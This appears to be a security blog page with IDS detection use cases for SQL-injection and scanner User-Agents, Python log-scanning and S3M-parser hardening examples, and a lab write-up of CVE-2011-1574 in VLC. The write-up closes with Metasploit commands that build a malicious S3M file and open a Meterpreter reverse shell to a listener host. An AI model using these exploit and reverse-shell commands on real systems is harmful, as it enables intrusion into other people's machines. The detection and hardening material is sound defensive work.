SUC024 : ET WEB SQL Injection Attempt (Agent NV32ts)

  • Use Case Reference : SUC024
  • Use Case Title : ET WEB SQL Injection Attempt (Agent NV32ts)
  • Use Case Detection : IDS / HTTP /SQL logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

  • SQL injection tool or bot

Source(s) :

Emerging Threats SIG 2009029 triggers are :

  • The HTTP request headers contain the string “NV32ts” in the User-Agent field. Example : “User-Agent: NV32ts”
  • The rule matches traffic from any source port on EXTERNAL_NET to HOME_NET on HTTP_PORTS.
[Figure : SIG 2009029 1 week events activity]
[Figure : SIG 2009029 1 month events activity]
[Figure : 1 month TOP 10 source IPs for SIG 2009029]

SUC023 : WebHack Control Center User-Agent Inbound (WHCC/)

  • Use Case Reference : SUC023
  • Use Case Title : WebHack Control Center User-Agent Inbound (WHCC/)
  • Use Case Detection : IDS / HTTP logs
  • Attacker Class : Opportunists / Targeting Opportunists 
  • Attack Sophistication : Unsophisticated / Low
  • Identified tool(s) : WebHack Control Center Web server vulnerability scanner
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

  • WebHack Control Center Web server vulnerability scanner

Source(s) :

Emerging Threats SIG 2003924 triggers are :

  • The HTTP request headers contain the string “WHCC/” in the User-Agent field. Example : “User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; WHCC/0.6; GTB6.6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; .NET4.0C)”
  • The rule matches traffic from any source port on EXTERNAL_NET to HOME_NET on HTTP_PORTS.
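As an added example (not part of the original page and not the Emerging Threats rule text), the following Python scans Apache combined-format access log lines for the two User-Agent indicators of SUC024 (“NV32ts”, SIG 2009029) and SUC023 (“WHCC/”, SIG 2003924) and tallies alerting source IPs the way the “TOP 10 source IPs” views do. The log lines are constructed for the example; matching the substring case-insensitively is an assumption about the rules' matching options, not something the page states.

```python
import re
from collections import Counter

# Constructed sample Apache combined-log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [12/May/2011:10:01:02 +0200] "GET /index.php?id=1' HTTP/1.1" 200 512 "-" "NV32ts"
203.0.113.5 - - [12/May/2011:10:01:03 +0200] "GET /index.php?id=1 and 1=1 HTTP/1.1" 200 512 "-" "NV32ts"
198.51.100.7 - - [12/May/2011:10:02:10 +0200] "GET /admin/ HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; WHCC/0.6; GTB6.6)"
192.0.2.9 - - [12/May/2011:10:03:00 +0200] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/4.0"
198.51.100.7 - - [12/May/2011:10:02:11 +0200] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 8.0; WHCC/0.6)"
"""

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# User-Agent substrings the two ET signatures key on, mapped to the use-case reference.
UA_INDICATORS = {
    "NV32ts": "SUC024",   # ET SIG 2009029
    "WHCC/": "SUC023",    # ET SIG 2003924
}


def parse_line(line):
    """Split one combined-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def match_ua(ua):
    """Return the use-case reference whose indicator appears in ua, else None.
    Case-insensitive comparison is an assumption (the rules' nocase behaviour)."""
    ua_l = ua.lower()
    for needle, ref in UA_INDICATORS.items():
        if needle.lower() in ua_l:
            return ref
    return None


def scan(log_text):
    """Return (alerts, sources): alerts is a list of (ref, src_ip, request) tuples,
    sources is a Counter of alerting source IPs for a 'top N sources' view."""
    alerts = []
    sources = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line; in production, count these separately
        ref = match_ua(rec["ua"])
        if ref:
            alerts.append((ref, rec["src"], rec["req"]))
            sources[rec["src"]] += 1
    return alerts, sources


if __name__ == "__main__":
    found, top = scan(SAMPLE_LOG)
    for ref, src, req in found:
        print(f"{ref} {src} {req}")
    print("top sources:", top.most_common(10))
```

The User-Agent string is the only trigger of both signatures, so a scanner that sets a browser-like agent is not seen by them; keep the request line (SQL metacharacters, paths probed) alongside the agent match when triaging, and treat the agent alone as an opportunistic-scanner indicator, not proof of a successful injection.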
[Figure : SIG 2003924 1 week events activity]
[Figure : SIG 2003924 1 month events activity]
[Figure : 1 month TOP 10 source IPs for SIG 2003924]

CVE-2011-1574 : VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow

Timeline :

libmodplug vulnerability discovered by SEC Consult
libmodplug vendor contacted on 2011-03-25
libmodplug vendor released a fixed version on 2011-04-02
libmodplug vulnerability publicly disclosed on 2011-04-07
VideoLAN VLC 1.1.9 released on 2011-04-12
Metasploit PoC provided by jduck on 2011-05-06

PoC provided by :

jduck

Reference(s) :

CVE-2011-1574
OSVDB-72143
VideoLAN VLC release notes

Affected version(s) :

VideoLAN VLC 1.1.8 and earlier versions for Windows, Macintosh, Linux and Solaris

Tested on Windows XP SP3 with :

VideoLAN VLC 1.1.8

Description :

This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.
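An added example, not code from the page, from libmodplug or from the Metasploit module: a small Python reader for the S3M header that models the input validation the description refers to. The header layout is the S3M format itself (order, instrument and pattern counts at offsets 0x20, 0x22 and 0x24 of the 96-byte header, the “SCRM” tag at 0x2C, then the order list and the 16-bit parapointer tables). The table limits MAX_ORDERS, MAX_INSTRUMENTS and MAX_PATTERNS, and the choice of the instrument parapointer table as the fixed-size object that an unchecked loader overruns, are assumptions for illustration; the page does not name the overflowed array or libmodplug's real limits. build_s3m constructs test input, including the oversized instrument count a malicious file would carry.

```python
import struct

# S3M header (96 bytes): 0x00 name[28], 0x1C 0x1A, 0x1D type, 0x1E reserved[2],
# 0x20 ordnum (u16), 0x22 insnum (u16), 0x24 patnum (u16), ..., 0x2C 'SCRM'.
# Then: ordnum order bytes, insnum instrument parapointers (u16),
# patnum pattern parapointers (u16).
HEADER_LEN = 96
# Table sizes are assumptions for this example, not libmodplug's values.
MAX_ORDERS = 256
MAX_INSTRUMENTS = 99
MAX_PATTERNS = 256


class S3MError(ValueError):
    pass


def build_s3m(name=b"test", insnum=1, patnum=1, ordnum=1):
    """Construct a minimal S3M byte string with the given header counts.
    Parapointer tables are zero-filled: a constructed test input, not a playable module."""
    hdr = bytearray(HEADER_LEN)
    hdr[0:28] = name.ljust(28, b"\0")[:28]
    hdr[0x1C] = 0x1A
    hdr[0x1D] = 16  # file type: S3M module
    struct.pack_into("<HHH", hdr, 0x20, ordnum, insnum, patnum)
    hdr[0x2C:0x30] = b"SCRM"
    body = bytes(ordnum) + bytes(2 * insnum) + bytes(2 * patnum)
    return bytes(hdr) + body


def s3m_counts(data):
    """Return (ordnum, insnum, patnum) from a header whose magic checks out."""
    if len(data) < HEADER_LEN or data[0x2C:0x30] != b"SCRM":
        raise S3MError("not an S3M file")
    return struct.unpack_from("<HHH", data, 0x20)


def overflow_bytes(data, table_len=MAX_INSTRUMENTS):
    """Bytes an unchecked loader would write past a table_len-entry u16 instrument
    parapointer table when it copies insnum entries (0 means no overrun)."""
    _, insnum, _ = s3m_counts(data)
    return max(0, 2 * (insnum - table_len))


def parse_s3m_checked(data):
    """Hardened loader: bound every header count before it sizes a copy or indexes
    a table, and confirm the file actually carries the tables it announces."""
    ordnum, insnum, patnum = s3m_counts(data)
    if ordnum > MAX_ORDERS or insnum > MAX_INSTRUMENTS or patnum > MAX_PATTERNS:
        raise S3MError(f"header counts out of range: ord={ordnum} ins={insnum} pat={patnum}")
    need = HEADER_LEN + ordnum + 2 * (insnum + patnum)
    if len(data) < need:
        raise S3MError(f"truncated file: need {need} bytes, have {len(data)}")
    off = HEADER_LEN
    orders = list(data[off:off + ordnum])
    off += ordnum
    ins_ptrs = list(struct.unpack_from(f"<{insnum}H", data, off))
    off += 2 * insnum
    pat_ptrs = list(struct.unpack_from(f"<{patnum}H", data, off))
    return {"orders": orders, "instruments": ins_ptrs, "patterns": pat_ptrs}


def loads_ok(data):
    """True if the hardened loader accepts the file, False if it rejects it."""
    try:
        parse_s3m_checked(data)
        return True
    except S3MError:
        return False


if __name__ == "__main__":
    benign = build_s3m(insnum=4, patnum=2, ordnum=3)
    evil = build_s3m(insnum=0xFFFF)  # constructed: oversized instrument count
    print("benign accepted:", loads_ok(benign), "overrun:", overflow_bytes(benign))
    print("evil accepted:", loads_ok(evil), "overrun:", overflow_bytes(evil))
```

Two checks matter: the count bound, which stops the copy into a fixed-size table from being sized by an attacker-controlled 16-bit field, and the length check, which stops a short crafted file from making the loader read past the end of its input. Either on its own leaves one of the two failure modes open.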

Commands :

use exploit/windows/fileformat/vlc_modplug_s3m
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid